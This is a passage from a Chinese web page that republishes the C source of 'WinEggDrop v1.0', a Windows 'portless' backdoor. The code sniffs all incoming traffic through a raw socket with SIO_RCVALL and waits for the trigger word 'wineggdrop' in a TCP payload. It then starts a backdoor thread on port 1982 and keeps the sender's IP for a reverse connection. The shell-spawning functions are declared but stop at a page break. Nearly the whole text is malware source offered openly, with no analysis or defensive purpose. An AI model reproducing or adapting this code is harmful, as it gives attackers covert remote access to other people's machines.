WinEggDrop v1.0　源代码

　 2007年10月15日03:58:37　评论(0条) 字体:[大中小]
相关热点：

//**********************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: NULL
// Purpose: To Demonstrate Some Portless Backdoor Technique
// Test PlatForm: Win 2K Pro And Server SP4
// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Test Yet)
//**********************************************************************

#include <windows.h>
#include <stdio.h>
#include <winsock2.h>

// Some Structures To Define
#define IP_HDRINCL        2
#define SIO_RCVALL         _WSAIOW(IOC_VENDOR,1)
#define MAX_PACK_LEN    65535
#define MAX_ADDR_LEN     16
#define MAX_HOSTNAME_LAN    255

typedef struct _iphdr
{
   unsigned char h_lenver;
   unsigned char tos;
   unsigned short total_len;
   unsigned short ident;
   unsigned short frag_and_flags;
   unsigned char ttl;
   unsigned char proto;
   unsigned short checksum;
   unsigned int   sourceIP;
   unsigned int   destIP;
}IP_HEADER;

typedef struct _tcphdr
{
   USHORT th_sport;
   USHORT th_dport;
   unsigned int th_seq;
   unsigned int th_ack;
   unsigned char th_lenres;
   unsigned char th_flag;
   USHORT th_win;
   USHORT th_sum;
   USHORT th_urp;
}TCP_HEADER;
// End Of Structure

// Global Variable
char SourceIPAddress[MAX_ADDR_LEN]; // Hold The Source IP(This Can Be Used To Do Reverse Connection)
int BackDoorPort = 0; // The Port Back Door Will Bind

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL   InitSocket();
BOOL   DoSniffing();
BOOL   DecodeIPPack(const char *Buffer,const int BufferSize);
BOOL   DecodeTCPPack(const char * TCPBuffer,const int BufferSize);
BOOL   IsWin2KOrAbove();
DWORD WINAPI StartBackDoor(LPVOID Para);
BOOL   GetABackDoorShell(const SOCKET ListenSocket);
BOOL     SendSocket(const SOCKET ClientSocket,const char *Message);
unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize);
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration

// Main Function
int main(int argc,char *argv[])
{
if (!IsWin2KOrAbove())    // This System Running This Program Is Not Win 2K Or Above
{
    printf("The Program Must Run Under Win 2k Or Above OS\n");    // Display This Message
    return -1;    // Quit The Program
}

if (argc == 2)      // We Get Argument
    BackDoorPort = atoi(argv[1]);      // Argument One Is The Back Door's Port
else    // No Argument
    BackDoorPort = 1982;      // Back Door's Port Will Be Defined On 1982

if (!InitSocket())     // Fail To Initize Socket
{
    printf("Fail To Start Up Winsock\n");    // Display Error Message
    return -1;    // Quit The Program
}
DoSniffing();    // Do Sniffing
return 0;     // Quit The Program
}// End Of Main Function

//-------------------------------------------------------------------------
// Purpose: To Initize Socket
// Return Type: Boolean
// Parameters: NULL
// This Is Too Simple,I Won't Comment It
//-------------------------------------------------------------------------
BOOL InitSocket()
{
WSADATA data;
WORD ver;

ver = MAKEWORD(2,2);
if (WSAStartup( ver, &data )!= 0 )
{
return FALSE;
}
return TRUE;
}// End Of InitSocket Function

//-------------------------------------------------------------------------
// Purpose: To Do None-Driver Sniffing
// Return Type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
BOOL DoSniffing()
{
int Length=0;    // Variable To Hold The Receive Buffer Length
char RecvBuf[MAX_PACK_LEN] = {0};     // Receive Buffer
SOCKET SocketRaw = INVALID_SOCKET;    // Raw Socket

SocketRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP);    // Create A Raw Socket
if (SocketRaw == INVALID_SOCKET)      // Fail To Create A Raw Socket
{
    printf("Fail To Create A Raw Socket\n");    // Display Error Message
    return FALSE;    // Return False
}

char FAR name[MAX_HOSTNAME_LAN];

if (gethostname(name, MAX_HOSTNAME_LAN) == SOCKET_ERROR)      // Fail To Get The Host Name
{
    printf("Fail To Get Host Name\n");    // Display Error Message
    closesocket(SocketRaw);      // Close The Raw Socket Created
    return FALSE;    // Return False
}

// The Below Is The NIC Stuff
struct hostent FAR * pHostent;
pHostent = (struct hostent * )malloc(sizeof(struct hostent));    // Allocate Hostent Buffer
pHostent = gethostbyname(name);
SOCKADDR_IN sa;
sa.sin_family = AF_INET;     // That's Internet Related
sa.sin_port = htons(0);      // Any Port Avariable On The OS
if (pHostent->h_addr_list[0] != 0)    // We Only Check The First NIC
{
    memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length);    // We Use The First NIC As The Sniffing Subject
}
else    // Well,The First NIC Is Not Valid
{
    printf("Get Host By Name Fails\n");      // Display Error Message
    free(pHostent);     // Free The Hostent Buffer
    closesocket(SocketRaw);
    return FALSE;    // Return FALSE;
}
free(pHostent);     // Free The Hostent Buffer

if (bind(SocketRaw, (PSOCKADDR)&sa, sizeof(sa)) == SOCKET_ERROR)    // Bind The Raw Socket On The First NIC,But Fails
{
    printf("Fail To Bind\n");    // Display Error Message
    closesocket(SocketRaw);      // Close The Raw Socket
    return FALSE;    // Return False
}

// Forget About The Below A Few Lines,They Are Just A Static Routine To Do The None_Driver Sniffing(Some Sort Of Must-Have Codes)
DWORD dwBufferLen[10] ;
DWORD dwBufferInLen = 1 ;
DWORD dwBytesReturned = 0 ;

if (WSAIoctl(SocketRaw, SIO_RCVALL,&dwBufferInLen, sizeof(dwBufferInLen),&dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL) == SOCKET_ERROR)
{
closesocket(SocketRaw);
return FALSE;
}

while(TRUE)      // Sniffing Starts Here With Forever Loop
{
    memset(RecvBuf, 0, sizeof(RecvBuf));     // Reset The Receive Buffer
     Length = recv(SocketRaw, RecvBuf, sizeof(RecvBuf), 0);    // Try To Receive Data
    if (Length == SOCKET_ERROR)     // Get Error As Receiving Data
    {
       printf("Fail To Receive Data\n");     // Display Error Message
       break;     // Leave The Loop
    }
    if (DecodeIPPack(RecvBuf,Length))     // Decode The Buffer Received,And The Active Code Is Found
    {
       printf("Bingo,The BackDoor Is Activated On Port %d\n",BackDoorPort);      //We Are Going To Activate The BackDoor
       DWORD dwThreadID;
       HANDLE BackDoorThread = CreateThread(NULL,0,&StartBackDoor,NULL,0,&dwThreadID);    // Create The Back Door Thread
       WaitForSingleObject(BackDoorThread,INFINITE);     // Wait Until The Back Door Ends
    }
}

closesocket(SocketRaw); // Close The Raw Socket
return TRUE; // Return
}// End Of DoSniffing Function

//-------------------------------------------------------------------------
// Purpose: To Decode The IP Packer
// Return Type: Boolean
// Parameters: 1.const char *Buffer   -->The Received Buffer
//              2.Const int BufferSize -->The Received Buffer Size
//-------------------------------------------------------------------------
BOOL DecodeIPPack(const char *Buffer,const int BufferSize)
{
IP_HEADER *pIpheader;     // IP Header
SOCKADDR_IN saSource, saDest;
pIpheader = (IP_HEADER *)Buffer;      // Transfer The Buffer Into IP Header Form
int Protocol = pIpheader->proto;      // Get The Protocol
if ((Protocol != IPPROTO_TCP))     // Not TCP Protocol
{
    return FALSE;    // Return False Since We Only Interest In TCP Protocol
}

saSource.sin_addr.s_addr = pIpheader->sourceIP;
strncpy(SourceIPAddress, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN); // Get The Source IP(Important For Doing Reverse Connection)

int IPLength = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf); // Get The IP Length
return DecodeTCPPack(Buffer+IPLength, BufferSize); // Decode TCP Packer
}// End Of DecodeIPPack Function

//-------------------------------------------------------------------------
// Purpose: To Decode The TCP Packer
// Return Type: Boolean
// Parameters: 1.const char *TCPBuffer -->The TCP Buffer
//              2.Const int BufferSize   -->The TCP Buffer Size
//-------------------------------------------------------------------------
BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize)
{
TCP_HEADER * pTcpHeader;     // TCP Header
int iSourcePort,iDestPort;      // Source Port And DestPort

pTcpHeader = (TCP_HEADER * )TCPBuffer;      // Transfer The Buffer Into TCP Header Form
int TcpHeaderLen = pTcpHeader->th_lenres>>4;     // Get The TCP Leader Length
TcpHeaderLen *= sizeof(unsigned long);
char * TcpData=TCPBuffer+TcpHeaderLen;      // Get The TCP Data

iSourcePort = ntohs(pTcpHeader->th_sport);     // Get The Source Port
iDestPort = ntohs(pTcpHeader->th_dport);    // Get The Destination Port
if (strstr(TcpData,"wineggdrop")!=NULL)     // If The TCP Data Contains A Word "wineggdrop"(The Active Code),Then Bingo
{
    printf("%s:%d-->Local:%d\r\n",SourceIPAddress,iSourcePort,iDestPort);     // Display A Message
    return TRUE;     // Return TRUE(The Back Door Will Be Activated Soon)
}
return FALSE;    // We Didn't Receive An Active Code,Return False
}// End Of DecodeTCPPack Function

//-------------------------------------------------------------------------

[1] [2] 下一页

责任编辑：

拍一下